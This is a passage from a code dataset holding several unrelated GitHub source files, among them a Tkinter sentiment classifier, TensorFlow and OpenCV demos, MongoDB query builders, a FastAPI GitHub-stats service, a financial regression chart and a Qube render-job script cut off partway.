self.vectorizer.fit(sentences_train)\r\n\r\n X_train = self.vectorizer.transform(sentences_train)\r\n X_test = self.vectorizer.transform(sentences_test)\r\n # print(X_train)\r\n\r\n self.classifier.fit(X_train, y_train)\r\n score = self.classifier.score(X_test, y_test)\r\n\r\n print(\"Current Accuracy: \", score)\r\n\r\n\r\n\r\nroot = tk.Tk()\r\n\r\nproto = Prototype(root)\r\n\r\nproto.mainloop()\r\n\r\n\r\n# df = pd.read_csv('prototipo_tweets.csv')\r\n\r\n# # print(df.iloc[0])\r\n\r\n# text = df['text'].values\r\n# y = df['sentiment'].values\r\n\r\n# sentences_train, sentences_test, y_train, y_test = train_test_split(text, y, test_size=0.25, random_state=1000)\r\n\r\n# vectorizer = CountVectorizer()\r\n# vectorizer.fit(sentences_train)\r\n\r\n# X_train = vectorizer.transform(sentences_train)\r\n# X_test = vectorizer.transform(sentences_test)\r\n# # print(X_train)\r\n\r\n# classifier = LogisticRegression()\r\n# classifier.fit(X_train, y_train)\r\n# score = classifier.score(X_test, y_test)\r\n\r\n# # print(sentences_test)\r\n\r\n# # test_string = [\"deprimido agobiado ansioso ansiedad triste sufriendo cuarentena ayuda\"]\r\n# test_string = [\"si\"]\r\n# # vectorize\r\n# test_string = vectorizer.transform(test_string)\r\n\r\n# score2 = classifier.predict(test_string)\r\n\r\n# print(\"Test Acc: \", score2)\r\n\r\n# print(\"Accuracy:\", score)\r\n\r\n\r\n# window.title(\"App\")\r\n\r\n# window.geometry('570x200')\r\n\r\n# # labels\r\n# Label(window, text=\"Inserte un texto para analizar: \").grid(row=0, sticky=W)\r\n\r\n# # text input\r\n# txt = scrolledtext.ScrolledText(window,width=45,height=3)\r\n# txt.grid(column=1,row=0)\r\n\r\n# Button(window, text =\"Test Microblog\", command = test_string).grid(row=1)","repo_name":"Josrodjr/proyecto_graduacion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4290035562","text":"#!/usr/bin/env python3\nfrom pprint import pprint\n\nimport tensorflow as tf\n\nfrom src.domains.flattened_hunger_games.flattened_hunger_games_as_numpy_values import infoset_acting_players\nfrom src.utils.tf_utils import print_tensors\n\naction_counts = [\n\t[2],\n\t[1, 6],\n\t[4, 0, 0, 0, 0, 0, 0],\n\t[3, 3, 2, 2],\n\t[2] * 10,\n\t[0] * 20,\n]\nnode_to_infoset = [\n\t[0],\n\t[0, 1],\n\t[0, 1, 1, 1, 1, 1, 1], # `1` for the infoset of terminal nodes\n\t[0, 0, 1, 1],\n\t[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n]\nsection_delimiter = \"##############################\"\nmask_of_inner_nodes = [\n\ttf.not_equal(\n\t\taction_count,\n\t\t0,\n\t\tname=\"mask_of_inner_nodes_lvl{}\".format(level)\n\t)\n\tfor level, action_count in enumerate(action_counts)\n]\ninner_node_to_infoset = [\n\ttf.expand_dims(\n\t\ttf.boolean_mask(\n\t\t\tnode_to_infoset_level,\n\t\t\tmask=mask_of_inner_nodes[level]\n\t\t),\n\t\taxis=-1,\n\t\tname=\"inner_node_to_infoset_lvl{}\".format(level),\n\t)\n\tfor level, node_to_infoset_level in enumerate(node_to_infoset)\n]\naction_counts_of_inner_nodes = [\n\ttf.boolean_mask(\n\t\taction_count,\n\t\tmask=mask_of_inner_nodes[level],\n\t\tname=\"action_counts_of_inner_nodes_lvl{}\".format(level)\n\t)\n\tfor level, action_count in enumerate(action_counts)\n]\ninfoset_action_counts = [\n\ttf.scatter_nd_update(\n\t\tref=tf.Variable(\n\t\t\ttf.zeros_like(\n\t\t\t\tinfoset_acting_players[level]\n\t\t\t)\n\t\t),\n\t\tindices=inner_node_to_infoset[level],\n\t\tupdates=action_counts_of_inner_nodes[level],\n\t\tname=\"infoset_action_counts_lvl{}\".format(level),\n\t)\n\tfor level in range(len(infoset_acting_players))\n]\n\n\nif __name__ == '__main__':\n\tprint(\"action_counts:\")\n\tpprint(action_counts, indent=1, width=80)\n\tprint(\"node_to_infoset:\")\n\tpprint(node_to_infoset, indent=1, width=80)\n\tprint(\"infoset_acting_players:\")\n\tpprint(infoset_acting_players, indent=1, width=40)\n\tprint(section_delimiter)\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer())\n\n\t\tfor level in range(len(infoset_acting_players)):\n\t\t\tprint(\"########## Level {} ##########\".format(level))\n\t\t\tprint_tensors(sess, [\n\t\t\t\tmask_of_inner_nodes[level],\n\t\t\t\tinner_node_to_infoset[level],\n\t\t\t\taction_counts_of_inner_nodes[level],\n\t\t\t\ttf.shape(\n\t\t\t\t\tinfoset_acting_players[level],\n\t\t\t\t\tname=\"infoset_acting_players_lvl{}\".format(level)\n\t\t\t\t),\n\t\t\t\tinfoset_action_counts[level]\n\t\t\t])\n\t\t\tprint(section_delimiter)\n\t\tprint(\"Check for multiple calls of `scatter_nd_update`\")\n\t\tprint(section_delimiter)\n\t\tprint_tensors(sess, infoset_action_counts)\n\t\tprint(section_delimiter)\n\t\tprint_tensors(sess, infoset_action_counts)\n\t\tprint(section_delimiter)\n\t\tprint_tensors(sess, infoset_action_counts)\n","repo_name":"aicenter/TensorCFR","sub_path":"src/showcases/tf_scatter_nd_update.py","file_name":"tf_scatter_nd_update.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"4978070240","text":"from datetime import datetime, timezone\r\nimport random\r\nimport string\r\nfrom bson import regex\r\n############################CREATE: addArticle()#############################\r\ndef create_article_id():\r\n id_1 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 8))\r\n id_2 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 4))\r\n id_3 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 4))\r\n id_4 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 4))\r\n id_5 = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 12))\r\n return \"nyt://article/\"+id_1+\"-\"+id_2+\"-\"+id_3+\"-\"+id_4+\"-\"+id_5\r\n\r\ndef create_keywords(kw_list):\r\n keywords = []\r\n for i in range(len(kw_list)-1):\r\n temp_dict = {}\r\n temp_list = kw_list[i].split(',')\r\n temp_dict[\"name\"] = temp_list[0]\r\n temp_dict[\"value\"] = temp_list[1]\r\n temp_dict[\"rank\"] = int(temp_list[2])\r\n temp_dict[\"major\"] = \"N\"\r\n keywords.append(temp_dict)\r\n return keywords\r\n\r\ndef create_byline(first, middle, last,rank):\r\n full_name = \"\"\r\n if middle == \"\":\r\n full_name = \"By \"+first+\" \"+last\r\n byline = {'original':full_name,'person':[{'firstname':first,'middlename':None,'lastname':last,'rank':rank}]}\r\n else:\r\n full_name = \"By \"+first+\" \"+middle+\" \"+last\r\n byline = {'original':full_name,'person':[{'firstname':first,'middlename':middle,'lastname':last,'rank':rank}]}\r\n return byline\r\n\r\ndef addArticle():\r\n article_id = create_article_id()\r\n pub_date = str(datetime.now().astimezone(timezone.utc).isoformat(timespec='seconds'))\r\n web_url = input(\"URL:\\t\")\r\n abstract = input(\"Abstract:\\t\")\r\n headline = input(\"Headline:\\t\")\r\n\r\n print(\"Person\")\r\n first_name = input(\"\\tFirst name:\\t\")\r\n middle_name = input(\"\\tMiddle name:\\t\")\r\n last_name = input(\"\\tLast name:\\t\")\r\n rank = input(\"\\tRank:\\t\")\r\n byline = create_byline(first_name,middle_name,last_name,rank)\r\n\r\n print(\"\\nPossible name choices: [subject, persons, organizations, glocations]\")\r\n print(\"Keywords (name,value,rank) -- press d when done\")\r\n kw_list=[]\r\n keyword = \"\"\r\n while keyword != \"d\":\r\n keyword = input(\"\\t\")\r\n kw_list.append(keyword)\r\n keywords = create_keywords(kw_list)\r\n\r\n word_count = int(input(\"Word count:\\t\"))\r\n \r\n print(\"\\n[Op-Ed, News, Letter, Schedule, Brief, Editorial, Review, Correction, Obituary (Obit), Slideshow]\")\r\n type_of_material = input(\"Type of material:\\t\")\r\n \r\n print(\"\\n[New York, Sports, Opinion, Business Day, Technology, Science, World, U.S., Arts, Opinion, World, Books, Crosswords & Games, Education, Health, Theater, Food]\")\r\n section_name = input(\"Section name:\\t\")\r\n \r\n print(\"\\n[College Football, Media, World Business, Middle East, Pro Basketball, Music, Art & Design, Asia Pacific, Americas, Europe, Hockey, Bridge, Africa, Asia, Australia, Televsion]\")\r\n subsection_name = input(\"Subsection name:\\t\")\r\n \r\n print(\"\\n[Metro, Sports, Letters, Business, National, Foreign, Editorial, Culture, ContinuousNews, OpEd, Summary, Science, New York, Finance, Magazine, Real Estate, Education, Dining]\")\r\n news_desk = input('News desk:\\t')\r\n\r\n source = input(\"Source:\\t\")\r\n\r\n article_doc = {'abstract':abstract,'web_url':web_url,'source':source,\r\n 'headline':{'main':headline,'kicker': None, 'content_kicker': None, \r\n 'print_headline': '', 'name': None, 'seo': None, 'sub': None},'keywords':keywords,\r\n 'pub_date':pub_date,'document_type':'article','news_desk':news_desk,\r\n 'section_name':section_name,'subsection_name': subsection_name, 'byline':byline,'type_of_material':type_of_material,\r\n '_id':article_id,'word_count':word_count,'uri':article_id, 'read_count':0}\r\n return article_doc\r\n######################RETRIEVE: findArticlesWKeyValueRank()######################\r\ndef findArticlesWKeyValueRank():\r\n value = input('Keyword value:\\t')\r\n rank = input('Rank:\\t')\r\n return {'value':value, 'rank':{'$gte':int(rank)}}\r\n######################RETRIEVE: findArticlesNWordCount()######################\r\ndef findArticlesNWordCount():\r\n word_count = int(input('Find articles with a word count >=:\\t'))\r\n return word_count\r\n######################RETRIEVE: getTotalWordCountSubsectionName()######################\r\ndef getTotalWordCountSubsectionName():\r\n print('Choose a section: [Fashion, Parenting, Video, Travel, New York, Sports, Opinion, Business Day, Technology, Science, World, U.S., Arts, Opinion, World, Books, Homepage, College, Movies, Education, Health, Theater, Food]')\r\n section_name = input('Section name:\\t')\r\n query=[\r\n {'$match': {'section_name': section_name}},\r\n\t {'$group': {'_id': '$subsection_name', 'total': {'$sum':'$word_count'}}},\r\n\t {'$sort': {'total':-1}}\r\n ]\r\n return query\r\n######################RETRIEVE: readAbstractBasedOnKeywordValueExpr()######################\r\ndef readAbstractBasedOnKeywordValue():\r\n expr = input('Enter a keyword value expression (case sensitive):\\t')\r\n query = {'keywords.value':{'$regex':f\"{expr}\"}}\r\n return query\r\n######################RETRIEVE: findArticlesFromDate()######################\r\n\"\"\"\r\nFind articles from a certain date\r\n Return the input which is date of article need to be find\r\n\"\"\"\r\ndef findArticlesFromDate():\r\n user_input = input('Selection: Find article from date (in YYYY/MM/DD HH/MM/SS) \\n')\r\n return user_input\r\n######################RETRIEVE: findOtherArticlesByPerson()######################\r\n\"\"\"\r\nFind articles by person by firstname + lastname \r\n Return the query by $elemMatch which use input are fistname and lastname of the author.\r\n\"\"\"\r\ndef findOtherArticlesByPerson():\r\n firstname = input('Input the first name of the author: \\n')\r\n lastname = input('Input the last name of the author')\r\n query = {'person':{'$elemMatch': {'firstname':firstname,'lastname': lastname}}} \r\n return query\r\n######################RETRIEVE: getTypeOfMaterialAndMultimedia()######################\r\n\"\"\"\r\nFind article by getting type of the material and multimedia\r\n Return query which use $exists to check for existing field, search by type of material\r\n\"\"\"\r\ndef getTypeOfMaterialAndMultimedia():\r\n input1 = input('Type of Material: \\n')\r\n query = {'type_of_material': input1, 'multimedia': {'$exists': True}}\r\n return query\r\n######################RETRIEVE: getArticle()######################\r\ndef getArticle():\r\n url = input('URL:\\t')\r\n query = {'web_url': url}\r\n return query\r\n\r\n######################UPDATE: updateReadCountForArticle()######################\r\ndef updateReadCountForArticle():\r\n inc_read = {'$inc':{'read_count':1}}\r\n return inc_read\r\n######################UPDATE: addCommentsToArticle()######################\r\ndef addCommentsToArticle():\r\n num_comments = int(input('How many comments will you add:\\t'))\r\n comments_list = []\r\n for i in range(num_comments):\r\n comment_info = {}\r\n comment_info['userDisplayName'] = input('\\tUser Display Name:\\t')\r\n comment_info['commentBody'] = input('\\tComment Body:\\t')\r\n comment_info['recommendations'] = int(input('\\tNumber of recommendations(integer):\\t'))\r\n comments_list.append(comment_info)\r\n query = {'$set':{'comments': comments_list}}\r\n return query\r\n######################DELETE: deleteManyArticlesWithSectionKeywordVal()######################\r\ndef deleteManyArticlesWithSectionKeywordVal():\r\n print('Sections: [Fashion, Parenting, Video, Travel, New York, Sports, Opinion, Business Day, Technology, Science, World, U.S., Arts, Opinion, World, Books, Homepage, College, Movies, Education, Health, Theater, Food]')\r\n section_name = input(\"Delete articles with section name:\\t\")\r\n kw_value = input(\"with keyword value:\\t\")\r\n query = {'section_name':section_name,'keywords': {'$elemMatch':{'value':kw_value}}}\r\n return query\r\n######################DELETE: deleteArticleWordReadCount()######################\r\ndef deleteArticleWordReadCount():\r\n wc = int(input('\\tDelete article where word count is less than (integer):\\t'))\r\n rc = int(input('\\tDelete article where read count is less than (integer):\\t'))\r\n query = {'word_count': {'$lt': wc}, 'read_count': {'$lt': rc}}\r\n return query\r\n######################UPDATE: addKeywordArticle()######################\r\ndef addKeywordArticle():\r\n new_kw = {}\r\n new_kw['name'] = input('Name of keyword [persons, subject, organizations]:\\t')\r\n new_kw['value'] = input('Keyword value:\\t')\r\n new_kw['rank'] = int(input('Rank of keyword(integer):\\t'))\r\n query = {'$push': {'keywords': new_kw}}\r\n return query\r\n######################RETRIEVE: getNMostPopularKeywords()######################\r\ndef getNMostPopularKeywords():\r\n top_n_kw = int(input('Get top __ keywords for articles:\\t'))\r\n query = {'keywords.value': {'$slice':top_n_kw}, 'web_url':1,'headline.main':1,'_id':0}\r\n return query\r\n######################RETRIEVE: getArticlesInSections()######################\r\ndef getArticlesInSections():\r\n print('Sections: [Fashion, Parenting, Video, Travel, New York, Sports, Opinion, Business Day, Technology, Science, World, U.S., Arts, Opinion, World, Books, Homepage, College, Movies, Education, Health, Theater, Food]')\r\n section_choices = []\r\n choice = \"\"\r\n print(\"Enter the sections as they appear. Press \\'d\\' when done.\")\r\n while choice != \"d\":\r\n choice = input(\"\\tSection:\\t\")\r\n section_choices.append(choice)\r\n return section_choices[:-1]\r\n######################DELETE: deleteOneArticle()######################\r\nif __name__ == \"__main__\": \r\n print(__name__)","repo_name":"giangduong96/NoSQl-MongoDB","sub_path":"UseCases.py","file_name":"UseCases.py","file_ext":"py","file_size_in_byte":9708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25078476613","text":"'''Problema 4:\n\nDado el siguiente listado:\n\nnotas = [(5, 5, 10, \"Regular\"), (10, 2, 4, \"Bueno\"), (10, 1, 9, \"Muy Bueno\"), (7, 2, 3, \"Sobresaliente\")]\n\nFiltrar aquellos que tiene la calificación cualitativa \"Regular o Bueno\"\n\n\n'''\n\n#Notas en estado numerico y cualitativo\nnotas = [(5, 5, 10, \"Regular\"), (10, 2, 4, \"Bueno\"), (10, 1, 9, \"Muy Bueno\"), (7, 2, 3, \"Sobresaliente\")]\n#Funcion lambda y filter que filtra el emncuentro de notas cua;itativas\n\nmiFuncion = filter( lambda x: x[3] == \"Regular\" or x[3]== \"Bueno\" , notas)\n#iMPRESION DE RESULTADOS\n\nprint(list(miFuncion))","repo_name":"ProgFuncionalReactivaoct19-feb20/laboratorio1-clase03-Shomira","sub_path":"problema4.py","file_name":"problema4.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40163205746","text":"import requests\r\nfrom fastapi import FastAPI, HTTPException\r\nfrom user_data import UserData\r\nfrom repository import Repository\r\n\r\napp = FastAPI()\r\n\r\n\r\ndef fetching_failed_exception(status_code: int):\r\n return HTTPException(\r\n status_code=status_code,\r\n detail=f'Code executed with status {status_code}. Fetching failed.')\r\n\r\n\r\ndef fetch_user_data(login, token):\r\n\r\n if token is None or token == '':\r\n headers = {'Authorization': ''}\r\n else:\r\n headers = {'Authorization': 'token ' + token}\r\n\r\n url_user = 'https://api.github.com/users/' + login\r\n\r\n url_repos = 'https://api.github.com/users/' + login + '/repos'\r\n\r\n name = None\r\n bio = None\r\n\r\n response_user = requests.get(url=url_user, headers=headers)\r\n\r\n if response_user.status_code == 200:\r\n data = response_user.json()\r\n name = data['name']\r\n bio = data['bio']\r\n elif response_user.status_code == 404:\r\n raise HTTPException(status_code=404, detail='User Not Found')\r\n else:\r\n raise fetching_failed_exception(response_user.status_code)\r\n\r\n response_repos = requests.get(url=url_repos, headers=headers)\r\n\r\n if response_repos.status_code == 200:\r\n data = response_repos.json()\r\n repositories = []\r\n for repo in data:\r\n repo_languages = requests.get(url=repo['languages_url'], headers=headers)\r\n if repo_languages.status_code == 200:\r\n repo_languages = repo_languages.json()\r\n else:\r\n raise fetching_failed_exception(repo_languages.status_code)\r\n repository = Repository(repo['name'], repo_languages)\r\n repositories.append(repository)\r\n return UserData(login, name, bio, repositories)\r\n elif response_repos.status_code == 404:\r\n raise HTTPException(status_code=404, detail='Repository Not Found')\r\n else:\r\n raise fetching_failed_exception(response_repos.status_code)\r\n\r\n\r\n@app.get('/user_info', status_code=200)\r\nasync def get_user_info(login: str = '', token: str | None = None):\r\n user_data = fetch_user_data(login, token)\r\n user_info = {\r\n 'login': user_data.user_login,\r\n 'name': user_data.user_name,\r\n 'bio': user_data.user_bio,\r\n 'languages_used': []\r\n }\r\n languages_info = user_data.get_all_language_stats()\r\n for lang_name, size_bytes in languages_info.items():\r\n user_info['languages_used'].append(\r\n {'language_name': lang_name,\r\n 'size_bytes': size_bytes})\r\n return user_info\r\n\r\n\r\n@app.get('/repositories_info', status_code=200)\r\nasync def get_repositories_info(login: str = '', token: str | None = None):\r\n user_data = fetch_user_data(login, token)\r\n repositories = {\r\n 'login': login,\r\n 'repositories': []\r\n }\r\n for repos in user_data.user_repositories:\r\n repo = {\r\n 'repository_name': repos.repository_name,\r\n 'languages': []\r\n }\r\n for lang_name, size_bytes in repos.repository_languages.items():\r\n lang_info = {\r\n 'language_name': lang_name,\r\n 'size_bytes': size_bytes\r\n }\r\n repo['languages'].append(lang_info)\r\n repositories['repositories'].append(repo)\r\n return repositories\r\n","repo_name":"lukaszwelnic/allegro-summer-experience-2022","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38365470614","text":"from typing import Tuple\n\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as pd\n\nfrom qf_lib.common.utils.dateutils.get_values_common_dates import get_values_for_common_dates\nfrom qf_lib.common.utils.returns.beta_and_alpha import beta_and_alpha_full_stats\nfrom qf_lib.containers.series.qf_series import QFSeries\nfrom qf_lib.plotting.charts.chart import Chart\nfrom qf_lib.plotting.decorators.axes_formatter_decorator import PercentageFormatter\n\n\nclass RegressionChart(Chart):\n \"\"\"\n Creates a regression chart.\n\n Parameters\n -----------\n benchmark_tms: QFSeries\n timeseries of the benchmark\n strategy_tms: QFSeries\n timeseries of the strategy\n tail_plot: bool\n plot tail data\n custom_title: bool\n add custom title to the plot\n \"\"\"\n def __init__(self, benchmark_tms: QFSeries, strategy_tms: QFSeries, tail_plot=False, custom_title=False):\n super().__init__()\n self.assert_is_qfseries(benchmark_tms)\n self.assert_is_qfseries(strategy_tms)\n\n self.benchmark_tms = benchmark_tms.to_simple_returns()\n self.strategy_tms = strategy_tms.to_simple_returns()\n self.tail_plot = tail_plot\n self.custom_title = custom_title\n\n def plot(self, figsize: Tuple[float, float] = None):\n self._setup_axes_if_necessary(figsize)\n self._apply_decorators()\n\n datapoints_tms, regression_line, beta, alpha, r_squared, max_ret = self._prepare_data_to_plot()\n self._plot_data(datapoints_tms, regression_line, beta, alpha, r_squared, max_ret)\n\n if self.tail_plot:\n _, regression_line, beta, alpha, r_squared, max_ret = self._prepare_data_to_plot(tail=True)\n self._plot_tail_data(regression_line, beta, alpha, r_squared, max_ret)\n\n self.axes.set_xlabel(self.benchmark_tms.name)\n self.axes.set_ylabel(self.strategy_tms.name)\n if self.custom_title is not False and isinstance(self.custom_title, str):\n self.axes.set_title(self.custom_title)\n else:\n self.axes.set_title('Linear Regression')\n\n def _prepare_data_to_plot(self, tail=False):\n strategy_rets = self.strategy_tms.to_simple_returns()\n benchmark_rets = self.benchmark_tms.to_simple_returns()\n\n strategy_rets, benchmark_rets = get_values_for_common_dates(strategy_rets, benchmark_rets)\n datapoints_tms = pd.concat((benchmark_rets, strategy_rets), axis=1)\n\n if tail:\n def get_tail_indices():\n avg_rets = strategy_rets.mean()\n std_rets = strategy_rets.std()\n # Tail events are < the avg portfolio returns minus one std\n return strategy_rets < avg_rets - std_rets\n\n tail_indices = get_tail_indices()\n strategy_tail_returns = strategy_rets.loc[tail_indices]\n\n beta, alpha, r_value, p_value, std_err = beta_and_alpha_full_stats(\n strategy_tms=strategy_tail_returns, benchmark_tms=benchmark_rets)\n else:\n beta, alpha, r_value, p_value, std_err = beta_and_alpha_full_stats(\n strategy_tms=strategy_rets, benchmark_tms=benchmark_rets)\n\n max_ret = datapoints_tms.abs().max().max() # take max element from the whole data-frame\n x = np.linspace(-max_ret, max_ret, 20)\n y = beta * x + alpha\n regression_line = QFSeries(data=y, index=pd.Float64Index(x))\n\n return datapoints_tms, regression_line, beta, alpha, r_value ** 2, max_ret\n\n def _plot_data(self, datapoints_tms, regression_line, beta, alpha, r_squared, max_ret):\n colors = Chart.get_axes_colors()\n\n self.axes.scatter(x=datapoints_tms.iloc[:, 0], y=datapoints_tms.iloc[:, 1],\n c=colors[0], alpha=0.6, edgecolors='black', linewidths=0.5)\n\n self.axes.axhline(0, color='black', axes=self.axes, linewidth=1)\n self.axes.axvline(0, color='black', axes=self.axes, linewidth=1)\n\n self.axes.plot(regression_line.index.values, regression_line.values, axes=self.axes, color=colors[1])\n\n self.axes.set_xlim([-max_ret, max_ret])\n self.axes.set_ylim([-max_ret, max_ret])\n\n props = dict(boxstyle='square', facecolor='white', alpha=0.5)\n textstr = '$\\\\beta={0:.2f}$\\n$\\\\alpha={1:.2%}$$\\%$\\n$R^2={2:.2}$'.format(beta, alpha, r_squared)\n font_size = mpl.rcParams['legend.fontsize']\n\n self.axes.text(\n 0.05, 0.95, textstr, transform=self.axes.transAxes, bbox=props, verticalalignment='top', fontsize=font_size)\n\n self.axes.xaxis.set_major_formatter(PercentageFormatter())\n self.axes.yaxis.set_major_formatter(PercentageFormatter())\n\n def _plot_tail_data(self, regression_line, beta, alpha, r_squared, max_ret):\n colors = Chart.get_axes_colors()\n\n self.axes.plot(regression_line.index.values, regression_line.values, axes=self.axes, color=colors[2])\n\n self.axes.set_xlim([-max_ret, max_ret])\n self.axes.set_ylim([-max_ret, max_ret])\n\n props = dict(boxstyle='square', facecolor=colors[2], alpha=0.5)\n textstr = 'tail $\\\\beta={0:.2f}$\\ntail $\\\\alpha={1:.2%}$$\\%$\\ntail $R^2={2:.2}$'.format(beta, alpha, r_squared)\n font_size = mpl.rcParams['legend.fontsize']\n\n self.axes.text(\n 0.80, 0.35, textstr, transform=self.axes.transAxes, bbox=props, verticalalignment='top', fontsize=font_size)\n","repo_name":"quarkfin/qf-lib","sub_path":"qf_lib/plotting/charts/regression_chart.py","file_name":"regression_chart.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":396,"dataset":"github-code","pt":"77"} +{"seq_id":"25758567721","text":"import cv2 as cv\r\nimport numpy as np\r\n\r\n\r\ndef create_image():\r\n img = np.zeros([400, 400, 3], np.uint8)\r\n img[: , : , 0] = np.ones([400, 400]) * 255\r\n cv.imshow(\"test\", img)\r\n\r\n\r\ndef alter_pixels(image):\r\n print(image.shape)\r\n height, width, channels = image.shape[0], image.shape[1], image.shape[2]\r\n for row in range(height):\r\n for col in range(width):\r\n for c in range(channels):\r\n pixel = image[row, col, c]\r\n image[row, col, c] = 255 - pixel\r\n cv.imshow('alterred', image)\r\n \r\n\r\nprint (\"Hello OpenCV\")\r\n\r\nimage_add = 'images/nice_bra.jpg'\r\n\r\nsrc = cv.imread(image_add)\r\ncv.namedWindow(\"input image\", cv.WINDOW_AUTOSIZE)\r\ncv.imshow(\"input image\", src)\r\ncreate_image()\r\nalter_pixels(src)\r\ncv.waitKey(0)\r\ncv.destroyAllWindows()","repo_name":"gbZachYin/OpenCV","sub_path":"2-numpy.py","file_name":"2-numpy.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30343489805","text":"from typing import Any, Dict\n\nimport pytest\nfrom robotcode.core.dataclasses import TypeValidationError, as_dict, from_dict\nfrom robotcode.robot.config.model import RobotConfig\n\n\n@pytest.mark.parametrize(\n (\"kwargs\"),\n [\n ({\"args\": 1}),\n ({\"python_path\": 1}),\n ({\"env\": 1}),\n ({\"output_dir\": 1}),\n ({\"args\": 1, \"output_dir\": 1}),\n ],\n)\ndef test_robot_config_cannot_assign_invalid_args(kwargs: Dict[str, Any]) -> None:\n with pytest.raises(TypeValidationError):\n RobotConfig(**kwargs)\n\n\ndef test_robot_config_can_created_from_dict() -> None:\n data: Dict[str, Any] = {\n \"args\": [\"--argument\"],\n \"python-path\": [\"asd\"],\n \"env\": {},\n \"variables\": {\"a\": \"1\"},\n \"variable-files\": [],\n \"paths\": [],\n \"console\": None,\n \"output-dir\": None,\n \"output\": None,\n \"log\": None,\n \"debug-file\": None,\n \"log-level\": None,\n \"languages\": [],\n \"pre-run-modifiers\": {},\n \"pre-rebot-modifiers\": {},\n \"listeners\": {},\n \"rpa\": True,\n }\n model = from_dict(data, RobotConfig)\n model_dict = as_dict(model)\n for key in data:\n assert model_dict[key] == data[key], key\n","repo_name":"d-biehl/robotcode","sub_path":"tests/robotcode/robot/config/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"77"} +{"seq_id":"19314530262","text":"from modules.npsb_read import npsb_read\nfrom modules.recon import recon\nfrom modules.converter import converter\n\nclass ia_maker:\n def __init__(self, proc, s_path):\n self.switchread = npsb_read(s_path)\n self.recon = recon()\n dlo = proc.DLO\n self.converter = converter()\n self.swframe = self.switchread.switchFrame\n self.bdframe = self.converter.convert(dlo, proc, self.recon)\n\n B_PAN = self.bdframe\n B_PAN['IA Status'] = B_PAN['PAN'].str.contains('462870|526238')\n self.B_PAN_issuing = B_PAN[B_PAN['IA Status'] == True]\n self.B_PAN_accuring = B_PAN[B_PAN['IA Status'] == False]\n\n S_PAN = self.swframe\n S_PAN['IA Status'] = S_PAN['PAN'].str.contains('462870|526238')\n self.S_PAN_issuing = S_PAN[S_PAN['IA Status'] == True]\n self.S_PAN_accuring = S_PAN[S_PAN['IA Status'] == False]\n","repo_name":"shanewas/npsb-recon","sub_path":"modules/issue_accuring_maker.py","file_name":"issue_accuring_maker.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17068657292","text":"import unittest\nimport os\n\n# Add parent dir to path to import utils\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),\n '..')))\nfrom test_cases import utils\n\n\nclass CRMTask(unittest.TestCase):\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def setUp(self):\n data = {\n 'status': 'API Test Task Name',\n 'priority': 'High'\n }\n self.obj = self.account.crm_tasks.create(data=data)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def tearDown(self):\n self.obj.delete()\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_list_object(self):\n objects = self.account.crm_tasks.all()\n # assert properties\n if objects:\n obj = objects[0]\n self.assertEqual(obj.type, 'Task')\n self.assertTrue('raw' in obj)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_read_object(self):\n obj = self.account.crm_tasks.retrieve(self.obj.id)\n # assert Task properties\n self.assertEqual(obj.id, self.obj.id)\n self.assertEqual(obj.type, 'Task')\n self.assertTrue('raw' in obj)\n\n self.assertTrue('created' in obj)\n self.assertTrue('modified' in obj)\n self.assertTrue('description' in obj)\n\n @utils.allow(services=['salesforce', 'dynamics', 'oracle'])\n def test_update_object(self):\n obj = self.obj\n obj.description = 'test task description'\n obj.save()\n self.assertEqual('test task description', obj.description)\n\n\ndef test_cases():\n return [utils.create_test_case(acc, CRMTask) for acc in utils.accounts]\n\nif __name__ == '__main__':\n suite = utils.create_suite(test_cases())\n unittest.TextTestRunner(verbosity=2).run(suite)\n","repo_name":"amir17688/google_data_p2","sub_path":"82338_test_task.py_C__Users_user_Desktop_data_2_data_google_data_Kloudless_kloudl.py","file_name":"82338_test_task.py_C__Users_user_Desktop_data_2_data_google_data_Kloudless_kloudl.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1790433689","text":"#!/usr/bin/env python\n# Below are required imports for the script to run\nimport os, sys\n# The next few lines attempt to import the Qube API. If the path to the qb module\n# is not in $PATH or $PYTHONPATH, we will attempt to find it by looking in known\n# locations \nimport sys\nsys.path.insert(0,\"/usr/local/pfx/qube/api/python/\")\nimport qb\n \n# Below is the main function to run in this script\ndef main():\n \n # Below creates an empty dictionary to be filled by the following lines of code\n job = {}\n \n # Below defines the name of the Qube! job. This is the name that will be\n # displayed in the GUI and through the command line tools\n job['name'] = 'Prman Test'\n # Below defines how many Instances/subjobs the job is to spawn. Because we\n # will be running only a single command, there 